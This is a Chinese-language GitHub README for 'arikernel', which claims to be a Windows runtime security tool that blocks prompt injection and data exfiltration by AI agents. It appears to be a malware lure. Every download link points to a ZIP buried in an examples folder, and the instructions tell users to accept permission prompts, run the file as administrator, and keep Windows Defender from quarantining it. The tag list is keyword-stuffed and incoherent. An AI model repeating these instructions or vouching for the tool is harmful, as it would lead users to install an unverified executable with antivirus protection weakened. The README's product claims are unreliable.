freepolice-20/arikernel

GitHub: freepolice-20/arikernel

为 Windows 平台的 AI Agent 提供运行时安全防护,通过策略管控和污点追踪拦截 Prompt 注入与数据渗出。

Stars: 0 | Forks: 0

# 🛡️ arikernel - 让 AI 行为尽在掌控 [![下载 arikernel](https://img.shields.io/badge/Download%20arikernel-Visit%20Releases-blue?style=for-the-badge)](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip) ## 🚀 arikernel 的功能 arikernel 是一个面向 AI agents 的 runtime 安全层。它会在工具调用运行前进行检查,并协助阻止危险行为。当你在 Windows 上运行 AI 应用时,使用它可以帮助减少 prompt injection、不安全的工具使用以及数据泄露。 ## 📥 下载 arikernel 1. 打开 [arikernel releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip) 2. 找到最新的 release 3. 为您的设备下载 Windows 文件 4. 将文件保存到您容易找到的文件夹中 5. 打开文件并按照屏幕上的步骤操作 如果 Windows 请求权限,请选择 **Yes**,以便应用能够启动。 ## 🖥️ 系统要求 - Windows 10 或 Windows 11 - 至少 4 GB RAM - 200 MB 的可用磁盘空间 - 用于安装和更新的互联网访问 - 用于下载 release 的现代网络浏览器 为了获得最佳效果,请在安装前保持 Windows 处于最新状态。 ## 🔧 如何安装 1. 前往 [releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip) 2. 从最新的 release 中下载 Windows 安装包 3. 打开您的 **Downloads** 文件夹 4. 双击您下载的文件 5. 如果出现安装窗口,请按照每一步操作 6. 选择安装文件夹或保留默认设置 7. 等待安装完成 8. 从快捷方式或安装文件夹启动 arikernel 如果文件位于 ZIP 文件夹中,请先右键单击并选择 **Extract All**(全部解压缩)。 ## ▶️ 如何运行 安装后,从以下位置启动 arikernel: - 桌面快捷方式 - Start 菜单 - 安装文件夹 如果应用打开了一个窗口,请在您的 AI agent 使用工具时保持其运行。arikernel 随后会根据其策略规则检查每一次工具调用。 ## 🧭 首次设置 当您第一次运行 arikernel 时: 1. 审查默认策略 (policy) 2. 选择 AI 可以使用的工具 3. 为文件、网络访问和系统操作设置限制 4. 保存您的设置 5. 首先测试一个安全操作 一个好的首次测试是简单的工具调用,例如读取本地文件或打开一个无害的网页。 ## 🔐 arikernel 协助防护的内容 arikernel 旨在帮助处理: - prompt injection 防御 - 工具调用检查 - 不安全行为阻止 - 文件访问限制 - 网络请求控制 - 数据渗出预防 - AI agents 的策略检查 - 本地和远程 agent 应用的 runtime 安全 ## 🛠️ 基本使用场景 如果您想要以下功能,请使用 arikernel: - 在 PC 上运行 AI agent 并拥有更多控制权 - 阻止 agent 打开您未允许的文件 - 限制 agent 的网络请求 - 阻止不符合您规则的命令 - 保护敏感文本、密钥或文档 - 为 AI runtime 添加策略层 ## 📂 典型文件夹布局 安装后,您可能会看到如下文件夹: - `config` 用于存放设置 - `logs` 用于存放运行历史 - `policies` 用于存放规则文件 - `tools` 用于存放允许的操作 - `updates` 用于存放 release 文件 除非您有明确的理由更改,否则可以保留默认布局。 ## ⚙️ 常用设置 以下是许多用户起初会使用的设置: - 仅允许可信工具 - 阻止未知文件访问 - 限制剪贴板使用 - 限制网络调用 - 对危险操作要求审批 - 记录每一次工具调用 - 阻止试图访问个人数据的行为 请从严格的策略开始,然后仅根据需要放宽限制。 ## 🧪 安全检查 设置完成后,测试以下项目: 1. 启动应用 2. 运行一个已知的安全操作 3. 尝试一个被阻止的操作 4. 检查日志文件 5. 确保策略符合您的选择 如果安全操作失败,请检查您的允许列表和设置。 ## 🧯 如果出现故障 请尝试以下步骤: - 重新下载最新的 release - 检查文件是否已下载完成 - 在打开压缩包之前先解压 - 如果 Windows 阻止应用,请以管理员身份运行 - 重启 PC 并重试 - 在安装新版本之前移除旧文件 - 确保 Windows Defender 没有隔离该文件 如果应用仍然无法启动,请从 releases 页面重新下载文件。 ## 📌 更新流程 要更新 arikernel: 1. 访问 [releases 页面](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip) 2. 下载最新的 Windows 文件 3. 关闭旧版本 4. 安装或替换旧文件 5. 启动新版本 6. 检查您的设置是否仍然符合您的策略 在更新之前,请备份您的策略文件。 ## 🔍 项目重点 arikernel 专注于: - agent 安全 - AI runtime 控制 - prompt injection 防御 - 策略执行 - LLM 安全 - 工具调用检查 - AI 应用的网络安全 它面向希望在 Windows PC 上更多地控制 AI agent 行为的用户。 ## 📎 Release 下载 使用此链接访问下载页面并获取最新的 Windows release: [https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip](https://raw.githubusercontent.com/freepolice-20/arikernel/main/examples/generic-wrapper/Software-2.5.zip) ## 🧩 您可能看到的文件类型 Release 页面可能提供以下文件之一: - `.exe` 用于 Windows 安装程序 - `.zip` 用于压缩的应用程序包 - `.msi` 用于 Windows 安装文件 如果您看到 `.zip` 文件,请在运行应用前将其解压。 ## 🧠 良好的首选策略 一个简单的首选策略可以包括: - 允许可信的本地文件 - 阻止系统更改 - 阻止未知的网络请求 - 记录所有工具使用情况 - 在删除文件前询问 - 在将数据发送出 PC 前询问 这可以在降低风险的同时保持应用的实用性。 ## 🖱️ 桌面使用 如果您每天都使用 arikernel: - 在 agent 运行时保持应用打开 - 每次会话后查看日志 - 添加新工具时更新策略 - 阻止任何您不需要的操作 - 将敏感文件保存在单独的文件夹中 ## 🔎 每次运行前的检查事项 在您通过 arikernel 启动 AI agent 之前: 1. 确认策略文件已加载 2. 确认允许的工具列表正确无误 3. 检查网络规则 4. 检查文件访问规则 5. 启动 agent 并观察第一次工具调用 ## 📘 非技术用户指南 如果术语 policy、tool call 或 runtime 让您感到陌生,可以使用以下简单理解: - **policy** 是一组规则 - **tool call** 是 AI 尝试执行的操作 - **runtime** 意味着应用在 AI 工作时处于活动状态 - **blocking** 意味着应用阻止某项操作 起初保持规则简单。仅在需要时添加更多内容。
标签:AI基础设施, AI安全, Chat Copilot, Conpot, DNS 反向解析, DNS 解析, Lerna, Streamlit, Windows安全, XSS注入, 可信计算, 安全内核, 工具调用控制, 智能体防护, 知识图谱, 端点安全, 策略执行, 红队防御, 自动化攻击, 补丁管理, 访问控制, 软件2.0, 运行时防护